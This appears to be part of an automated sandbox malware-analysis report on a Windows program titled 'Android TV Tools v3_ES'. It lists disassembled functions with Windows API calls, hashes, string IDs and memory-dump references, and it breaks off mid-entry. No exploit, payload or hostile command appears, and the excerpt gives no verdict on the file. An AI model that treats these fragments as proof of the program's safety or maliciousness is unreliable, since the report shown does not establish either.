                        • Opcode Fuzzy Hash: 0d56ca5cad879738d64fea35e25317797a88da85582025049e091cafbee42b77
                        • Instruction Fuzzy Hash: 1E115E30201209DFC720DF99ED45E22BBB6FB84724B10492AF256E75F1D7709846EF04
                        Function 00407337 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1462 407337-407345 1463 4073d1-4073d8 1462->1463 1464 40734b-407366 1462->1464 1465 4073e2 1463->1465 1464->1463 1466 407368-407372 call 40a4da 1464->1466 1467 4073e5-4073e9 1465->1467 1470 4073b0 1466->1470 1471 407374-407377 1466->1471 1474 4073b2-4073c2 call 40a460 1470->1474 1472 407379-40737c 1471->1472 1473 40737e-407392 call 40a4da * 2 1471->1473 1472->1473 1475 407394-4073a4 call 40a4da FindCloseChangeNotification 1472->1475 1473->1470 1473->1475 1481 4073c4-4073cb call 409272 1474->1481 1482 4073cd-4073cf 1474->1482 1475->1470 1487 4073a6-4073ae GetLastError 1475->1487 1481->1465 1482->1467 1487->1474
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000100,00000000,?,00000000,0040AA21,00000000), ref: 0040739C
                        • GetLastError.KERNEL32(?,00000000,0040AA21,00000000), ref: 004073A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ChangeCloseErrorFindLastNotification
                        • String ID:
                        • API String ID: 1687624791-0
                        • Opcode ID: f1965d678b67d3615b11a71d6e08b8914040d033c00d52028fdbc15ec9fa0c97
                        • Instruction ID: b84c0215f91ab881d8f446bb9404d36fe1e38b0d3790a2a0251880d5805ce127
                        • Opcode Fuzzy Hash: f1965d678b67d3615b11a71d6e08b8914040d033c00d52028fdbc15ec9fa0c97
                        • Instruction Fuzzy Hash: 41113A32E083089BF6105765AD49B2B3358AB42769F11457FEC04B62D2DBFCF844E11B
                        Function 00407522 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                        Download Yara Rule
                        APIs
                        • SetFilePointer.KERNELBASE(00000000,004077C5,00000000,?,00000000,?,?,004077C5,?,00000000,00000002,00000001,?,?), ref: 00407571
                        • GetLastError.KERNEL32 ref: 0040757E
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer
                        • String ID:
                        • API String ID: 2976181284-0
                        • Opcode ID: d79cffe0eace2165adb95f6e1714898f50e239d9efe542db10b5d1d8fd5a1575
                        • Instruction ID: 43fb3ff8955d71c7df25f22854cb706fbbd21b76865ed93209a7189df02148de
                        • Opcode Fuzzy Hash: d79cffe0eace2165adb95f6e1714898f50e239d9efe542db10b5d1d8fd5a1575
                        • Instruction Fuzzy Hash: 61110831D08701ABC700CBB8DD48A9537A4AB41379F204B7EF525E76D2E7B8E945D70A
                        Function 0040893C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,004064A2,00000000), ref: 0040894D
                          • Part of subcall function 00409815: HeapAlloc.KERNEL32(00000000,00000140,00408961), ref: 00409822
                        • HeapDestroy.KERNEL32 ref: 0040896B
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Heap$AllocCreateDestroy
                        • String ID:
                        • API String ID: 2236781399-0
                        • Opcode ID: e8bba990ccffa2263e0e2a483a6bb437c4793ec73d8d994b3a1b54e875279d9f
                        • Instruction ID: 2aac7c1394e53d3f3e241b4ce236eb09025fc4cfcb4860e37ea7bfaf2a03933a
                        • Opcode Fuzzy Hash: e8bba990ccffa2263e0e2a483a6bb437c4793ec73d8d994b3a1b54e875279d9f
                        • Instruction Fuzzy Hash: 76E05B757553019BEB102B709E49B7635D5BB8478AF00443AF988D81E5EB74C444A505
                        Function 00406869 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesA.KERNELBASE(0040E414,004067CD,?,00000000,00000000,0040E414,?,?,?,0040D108,0040D108), ref: 0040686D
                        • GetLastError.KERNEL32(?,?,?,0040D108,0040D108), ref: 00406878
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AttributesErrorFileLast
                        • String ID:
                        • API String ID: 1799206407-0
                        • Opcode ID: cc82ef407f6d86054e7289c396e8563b88531115bb3fcb10dbfc04f215eba6d2
                        • Instruction ID: 190a03a2e6e8e0156cf8b8d81b12f4a57a4c620664e03452b76d7cf4d8f2981d
                        • Opcode Fuzzy Hash: cc82ef407f6d86054e7289c396e8563b88531115bb3fcb10dbfc04f215eba6d2
                        • Instruction Fuzzy Hash: 9BE08631406700D9DF0427749D0C75B3A606F8136DF55CB7AE866A01F0C77D88559609
                        Function 00408DE6 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,?,00408DCA,000000E0,00408DB7,?,004075CD,00000100), ref: 00408E14
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 3204e1776a58b5f8538dd2b3008e8bd4b1f4afee07a9b8d4f3e541a377c3b46d
                        • Instruction ID: 87bc941ac8621733d738759247a0ee1dbd76439509efa145d36000547ea8371e
                        • Opcode Fuzzy Hash: 3204e1776a58b5f8538dd2b3008e8bd4b1f4afee07a9b8d4f3e541a377c3b46d
                        • Instruction Fuzzy Hash: 61E0C232802131A7DA206614BE007DB3724BF10370F060136FC84BB2E19B342C5155CC

                        Non-executed Functions

                        Function 0040C1E5 Relevance: 26.7, Strings: 21, Instructions: 417COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID:
                        • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                        • API String ID: 0-1157002505
                        • Opcode ID: 91c198814475ad20b00baa46edb7cd0f32e5d43a7861d63c3a379bfb68159c14
                        • Instruction ID: 2579d61e5318648577aea87276846eeb8dacae63ee80e8af8a22806d5028b4ca
                        • Opcode Fuzzy Hash: 91c198814475ad20b00baa46edb7cd0f32e5d43a7861d63c3a379bfb68159c14
                        • Instruction Fuzzy Hash: ADE1F131D55219DEEB248FA4C9957BE7BB1BB00300F28467BD401B62C2D37C9982DB5E
                        Function 0040B641 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00408CA5,?,Microsoft Visual C++ Runtime Library,00012010,?,0040D484,?,0040D4D4,?,?,?,Runtime Error!Program: ), ref: 0040B653
                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040B66B
                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040B67C
                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040B689
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                        • API String ID: 2238633743-4044615076
                        • Opcode ID: 867288824564334f3619757082f0dbebd42382dfb6261171ba2e325262ccdaa6
                        • Instruction ID: de74ab1525ea14d435eb6cc6dd20cd1ff6ab2bca9f2c39baf57a699a0f35d6ad
                        • Opcode Fuzzy Hash: 867288824564334f3619757082f0dbebd42382dfb6261171ba2e325262ccdaa6
                        • Instruction Fuzzy Hash: C8017531B40201AFCB11DFF59C80A677EE9DA58744301483BB609E31A0D779D8159BAE
                        Function 0040A05E Relevance: .3, Instructions: 259COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                        • Instruction ID: 2d158c1009ae456f37a5d11eca89f62052bc5679d8e3b992de952646bde8a11f
                        • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                        • Instruction Fuzzy Hash: 79B16C3590030ADFDB15CF04C5D0AA9BBA1BB58318F14C1AED81A6F382D735EA52CB94
                        Function 00408B81 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00408BEE
                        • GetStdHandle.KERNEL32(000000F4,0040D484,00000000,?,00000000,00000000), ref: 00408CC4
                        • WriteFile.KERNEL32(00000000), ref: 00408CCB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: File$HandleModuleNameWrite
                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $x@
                        • API String ID: 3784150691-2704448551
                        • Opcode ID: df2143502b701b13a0ead86e14fd4dc7c5c6fe193ade6b65076ebd06141f7b20
                        • Instruction ID: 38fcf710f914df7c8948c21a669aeb727ca3293119fd2f73b68b07cef56c78a5
                        • Opcode Fuzzy Hash: df2143502b701b13a0ead86e14fd4dc7c5c6fe193ade6b65076ebd06141f7b20
                        • Instruction Fuzzy Hash: DC31C772A012086EEB20AB61CD49F9B777CEB45314F50047BF584F61C0DA78A9958F6D
                        Function 0040BE20 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • LCMapStringW.KERNEL32(00000000,00000100,0040D514,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BE62
                        • LCMapStringA.KERNEL32(00000000,00000100,0040D510,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BE7E
                        • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BEC7
                        • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BEFF
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040BF57
                        • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040BF6D
                        • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040BFA0
                        • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040C008
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: String$ByteCharMultiWide
                        • String ID:
                        • API String ID: 352835431-0
                        • Opcode ID: eae2aa2bde7858584f9a91431d64d86d5fae59c2fa5213f05ca84d6fd01fc824
                        • Instruction ID: caf144f6782c282f1fb5cc2b4170338e13de84eb125e1eeb8fe7c591b5a57659
                        • Opcode Fuzzy Hash: eae2aa2bde7858584f9a91431d64d86d5fae59c2fa5213f05ca84d6fd01fc824
                        • Instruction Fuzzy Hash: B9513A71900209EFCF228F94CD45ADB7FB9FB48754F20412AF915B22A0D3398965DFA9
                        Function 0040880A Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004064C8), ref: 00408825
                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004064C8), ref: 00408839
                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004064C8), ref: 00408865
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004064C8), ref: 0040889D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004064C8), ref: 004088BF
                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004064C8), ref: 004088D8
                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004064C8), ref: 004088EB
                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00408929
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                        • String ID:
                        • API String ID: 1823725401-0
                        • Opcode ID: 2128200c2dec99112e6e3d97e987e26460640e4f1291a272db4ce0cace52e8e4
                        • Instruction ID: eb6923129fc198a291aa4392daaae0253ef6126e5f38dd87825d6eb0f0d04450
                        • Opcode Fuzzy Hash: 2128200c2dec99112e6e3d97e987e26460640e4f1291a272db4ce0cace52e8e4
                        • Instruction Fuzzy Hash: 893137B38042155FD7203BB56E8483B769CEA49348B51453FF5C1F3381EE388C42926E
                        Function 0040A643 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                        Download Yara Rule
                        APIs
                        • GetStringTypeW.KERNEL32(00000001,0040D514,00000001,00000000,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A682
                        • GetStringTypeA.KERNEL32(00000000,00000001,0040D510,00000001,00000000,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A69C
                        • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A6D0
                        • MultiByteToWideChar.KERNEL32(0040B53F,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A708
                        • MultiByteToWideChar.KERNEL32(0040B53F,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?), ref: 0040A75E
                        • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?), ref: 0040A770
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: StringType$ByteCharMultiWide
                        • String ID:
                        • API String ID: 3852931651-0
                        • Opcode ID: 2eecb771c646a8312660574022f2fa4698ce1d4a762b91853752a18b02e08ce0
                        • Instruction ID: d8b8f3ae18008e25f8c65a2e95e7f3221f58a96c8a8c78502c253b54901eb93f
                        • Opcode Fuzzy Hash: 2eecb771c646a8312660574022f2fa4698ce1d4a762b91853752a18b02e08ce0
                        • Instruction Fuzzy Hash: E4416071900209AFCF209F94CC85EEF7FB9EB08754F108536F915A2290C339C9659BAA
                        Function 0040CDFA Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f6300edd1b72ee42fb2a2c78bbbcfa209d2ba629295c382778fc1eb378479e2
                        • Instruction ID: e457cf3dc0a161c47f043460bd6a0560b05df537884281ffeb8cb34ae73c9f8f
                        • Opcode Fuzzy Hash: 4f6300edd1b72ee42fb2a2c78bbbcfa209d2ba629295c382778fc1eb378479e2
                        • Instruction Fuzzy Hash: 3121B33A900105EACF21DB94DE81AAF37B9EB44314F1002BBF511F22E0E3358949DBAC
                        Function 00404D05 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                        Download Yara Rule
                        APIs
                        • GetTickCount.KERNEL32 ref: 00404D10
                        • GetTickCount.KERNEL32 ref: 00404D19
                        • Sleep.KERNEL32(00000001,?,?,00404A76), ref: 00404D2B
                        Strings
                        Memory Dump Source
